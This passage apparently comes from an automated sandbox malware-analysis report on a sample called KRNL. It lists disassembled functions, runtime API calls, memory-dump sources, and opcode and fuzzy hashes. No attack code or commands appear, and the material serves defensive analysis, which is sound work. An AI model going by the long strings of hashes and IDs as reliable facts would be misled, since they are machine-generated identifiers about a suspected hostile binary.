                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3e0e0c270f296bffe0e1446ce1f6b543816833ca692cc9a935f245fec58890
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B5106B5704305EADB24AB34CC46FB673E8EF05724F144629F549971C2EA7CE98087E5
                                                                                                                                                                                                                                                          Function 006E73E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Concurrency::details::_Release_chore.LIBCPMT ref: 006E7526
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E7561
                                                                                                                                                                                                                                                            • Part of subcall function 006EAF37: CreateThreadpoolWork.KERNEL32(006EB060,006E8A2A,00000000), ref: 006EAF46
                                                                                                                                                                                                                                                            • Part of subcall function 006EAF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 006EAF53
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: Fail to schedule the chore!$G.q
                                                                                                                                                                                                                                                          • API String ID: 3683891980-4289182727
                                                                                                                                                                                                                                                          • Opcode ID: 1820e38347da644820f71d54fe1c2df4c89fb2003db227e515c47da4987f1df4
                                                                                                                                                                                                                                                          • Instruction ID: c5c31b02e7e76ad7c242f9661e7fc1727bc66479e59dddb65c88342f62da0b48
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1820e38347da644820f71d54fe1c2df4c89fb2003db227e515c47da4987f1df4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07517BB0902348DFCB05DF94D844BAEBBB6FF48314F144129E8196B391E779AA05CB95
                                                                                                                                                                                                                                                          Function 006E3E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E3EC6
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E4002
                                                                                                                                                                                                                                                            • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EABE5
                                                                                                                                                                                                                                                            • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EAC09
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                          • String ID: bad locale name$|=ne.q
                                                                                                                                                                                                                                                          • API String ID: 2070049627-3641304814
                                                                                                                                                                                                                                                          • Opcode ID: 224fc745ae706d962f2b4e98e40500617b091a4b1d10f48a664cae545d654513
                                                                                                                                                                                                                                                          • Instruction ID: c8b075d3f7149adb5063850cb13611cc796dba9b14e580510db145941b615297
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 224fc745ae706d962f2b4e98e40500617b091a4b1d10f48a664cae545d654513
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77418EF0A007559BEB10DF6AC809B57BAF9BF04714F04422CE4099B781E37AE618CBE5
                                                                                                                                                                                                                                                          Function 006EB755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EB809
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                          • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                          • Opcode ID: ad9d5c75d85a87d20b9d4d70ea688022673c6ffc9ec02439ccd613887632bd88
                                                                                                                                                                                                                                                          • Instruction ID: ca7a1570d745cd85b90d7508e7b0b1753db69ce7919babec99c5d67558c50083
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad9d5c75d85a87d20b9d4d70ea688022673c6ffc9ec02439ccd613887632bd88
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20210331902389DFCF249F56D941ABBB7AEEF54720F24551DE4018BB80DB34AA41CB80
                                                                                                                                                                                                                                                          Function 006EF11D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
                                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                          • String ID: :%n
                                                                                                                                                                                                                                                          • API String ID: 2551024706-2487494124
                                                                                                                                                                                                                                                          • Opcode ID: cf6b89112603431ae6929f9869fd0010ed2fd97ab9a18872b06b329990857236
                                                                                                                                                                                                                                                          • Instruction ID: c27027fd2ae53da7c7fcefa87e2fbe1e7739d6b61703c9a9c0f39f4465083014
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6b89112603431ae6929f9869fd0010ed2fd97ab9a18872b06b329990857236
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F08271655218EFDF108F29DC05ADA3B65EB01B70F248320F821EA2E0E730EE41C690
                                                                                                                                                                                                                                                          Function 006EABC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Yarn
                                                                                                                                                                                                                                                          • String ID: e.q$|=ne.q
                                                                                                                                                                                                                                                          • API String ID: 1767336200-1506673154
                                                                                                                                                                                                                                                          • Opcode ID: 44f7624037389ae8866c6fd5a4c7047b91fbb02b753d0d7c8d4e28b539063395
                                                                                                                                                                                                                                                          • Instruction ID: 5652a72172c1655732cdbc06ad4945204099ef7c9978b85cbf39467072c7808a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f7624037389ae8866c6fd5a4c7047b91fbb02b753d0d7c8d4e28b539063395
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E065323087046FE74C7A6AAC52BB637DDDF04B60F20002DFA1A865C1ED10BC444569
                                                                                                                                                                                                                                                          Function 00706940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C), ref: 0070694D
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C,00000000,?,006FBBBC), ref: 00706957
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0070697F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: cf1b97fed0619971c168c961d5243a05fb2cad014dbe3e0cf20c42ab6d781e4d
                                                                                                                                                                                                                                                          • Instruction ID: 220de2021965a021cd5d3ea174db668cff5f310e282c1e19eeb8475691912a76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1b97fed0619971c168c961d5243a05fb2cad014dbe3e0cf20c42ab6d781e4d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE01270390204FADF101FA4EC06FAC3A959B40B91F148564F94CA88E0D779ED609984
                                                                                                                                                                                                                                                          Function 00703F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(AB1687B8,00000000,00000000,?), ref: 00704001
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00704253
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00704299
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0070433C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                          • Opcode ID: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction ID: 63b9e8cb4f49cefcc034a0c9f177bb6423c7d55d8751590667e79805d36a2608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2D149B5E00258DFCF15CFA8C880AEDBBF5FF49314F14826AEA55EB291D634A941CB50
                                                                                                                                                                                                                                                          Function 006FB295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                          • Opcode ID: 09fcfa6e1fc22b6ba0d67e3224577b1957c69d6c82f142cc3a092ac09252b0ba
                                                                                                                                                                                                                                                          • Instruction ID: 2d4179a66163b8028f5c1bd9e23ea5f88f828f1c7e0d9d398d6c6a674270c05f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09fcfa6e1fc22b6ba0d67e3224577b1957c69d6c82f142cc3a092ac09252b0ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51D17364570AEFEB299F54C991BBA73A6EF40710F14502DEA0647291D731ED81CB90
                                                                                                                                                                                                                                                          Function 006E7220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006E72C5
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E7395
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E73A3
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E73B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2261580123-0
                                                                                                                                                                                                                                                          • Opcode ID: d84bc1c333bb0172b5a0cd114a46298ccf83f6ddcf1c56f96832921084f59115
                                                                                                                                                                                                                                                          • Instruction ID: 018311f600b65332b7589c60e7806c97970d9d203e802bfd0f58c2778fd51256
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d84bc1c333bb0172b5a0cd114a46298ccf83f6ddcf1c56f96832921084f59115
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074124B1901385CBDB60DB26C8417AFB7A6BF44320F14463DD81647791EB30E805CBD1
                                                                                                                                                                                                                                                          Function 006E4460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E4495
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E44B2
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E44D3
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E4580
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 593203224-0
                                                                                                                                                                                                                                                          • Opcode ID: 286b2a9f429a133909291e8b0c32ed6dc3f7e38ed0f60f91e2a9690257a5680b
                                                                                                                                                                                                                                                          • Instruction ID: 53c1f292e5f44b11e293599a9165b762454b44f2d106c8d99ad470bf41b7a790
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 286b2a9f429a133909291e8b0c32ed6dc3f7e38ed0f60f91e2a9690257a5680b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21416B71D013588FCB11DFA9D844AEDB7B2FB48720F158229E81567391DB38A940CF95
                                                                                                                                                                                                                                                          Function 00701DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00701E2A
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00701E31
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00701E6B
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00701E72
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                          • Opcode ID: 00f9750563f2fe673a8d33c5edbd75144119448b6ac6ad0782044d2ef46c86c3
                                                                                                                                                                                                                                                          • Instruction ID: e32ca57ab662ea4217ef8587730b4fae0062c38fe3cdb8637493012fbabafb19
